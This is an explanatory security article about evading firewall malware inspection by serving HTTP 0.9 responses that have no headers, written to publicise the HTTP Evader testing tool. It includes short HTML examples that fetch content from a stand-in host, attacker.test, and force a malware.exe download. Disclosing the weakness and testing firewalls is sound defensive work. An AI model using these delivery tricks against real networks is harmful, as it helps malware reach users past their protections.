September 2015

Please note that republishing this article in full or in part is only allowed under the conditions described here.

HTTP Evasions Explained - Part 1 - Evading Using HTTP 0.9

This is the first article in a series which will explain the evasions done by HTTP Evader. It covers the case that most firewalls only block what they detected as explicitly bad and simply pass what they don't understand. The main technique used in this part is the old but still working HTTP 0.9 protocol.

The series then is continued with Part 2 - Deflate Compression.

What is HTTP 0.9

HTTP version 0.9 was the first version of the HTTP protocol, defined in 1991 but already used earlier. It simply consists of a GET request on the client side which slightly resembles todays GET request, followed by a response on the server side. Contrary to HTTP 1.0 (specified 1996) the response does not consist of the response header and the response body, but only contains the body. This means it is not possible to specificy the data type (Content-type), use compressions (Content-Encoding) or give the length of the body (Content-Length), so the response simply ends with the close of the underlying TCP connection by the server.

For example todays HTTP 1.1 would contain header and body and look like this:

HTTP/1.1 200 ok Content-type: application/octet-stream Content-length: 68 some-malware-here

Whereas with HTTP 0.9 it would be only the body without header:

some-malware-here

Interestingly, HTTP 0.9 responses to HTTP 1.1 requests are accepted by all major browsers (except Safari) even though one would not expect to have any servers speaking this protocol today.

How can HTTP 0.9 be used to evade malware analysis

A HTTP 0.9 response does not look like the expected HTTP 1.x response, because it does not include a response header. Thus one would expect a firewall to actually block such a response, because it looks like a violation of the HTTP protocol. And no sane firewall today should assume that there is a real HTTP 0.9 server still used in production. Alternatively the firewall might do a malware analysis of the HTTP 0.9 response.

But, surprisingly most of the firewalls I've seen simply pass a HTTP/0.9 response through without further inspection. From the 5 Gartner-Top 10 firewalls I've seen in the test reports I've got from the users of HTTP Evader only a single one blocks these responses and all the others (i.e. 80%) could be bypassed this way. Since they don't analyze these HTTP 0.9 responses for malware one might assume that these firewalls simply let everything pass what they don't understand.

Since at the time HTTP 0.9 was defined it was used to display HTML only (no content type could be defined) one might consider it not dangerous because it only gets displayed in the browser. But by combining the old HTTP 0.9 with the modern HTML 5 one might simply enforce a download by using the download attribute:

<a href="http://attacker.test/http09-response" download="malware.exe">

Similarly a HTTP 0.9 response could be used as script, image or HTML page by embedding it inside the appropriate context:

<script src="http://attacker.test/http09-response.js"> <img src="http://attacker.test/http09-response.gif"> <a href="http://attacker.test/http09-response.html">

This way any other filtering based on the type of the content could be bypassed.

Try it for yourself

If you are behind some content filtering firewall you might test if its malware analysis of HTTP traffic could be evaded by this or other methods. All you need a browser and then follow the instructions to test against the HTTP Evader tool.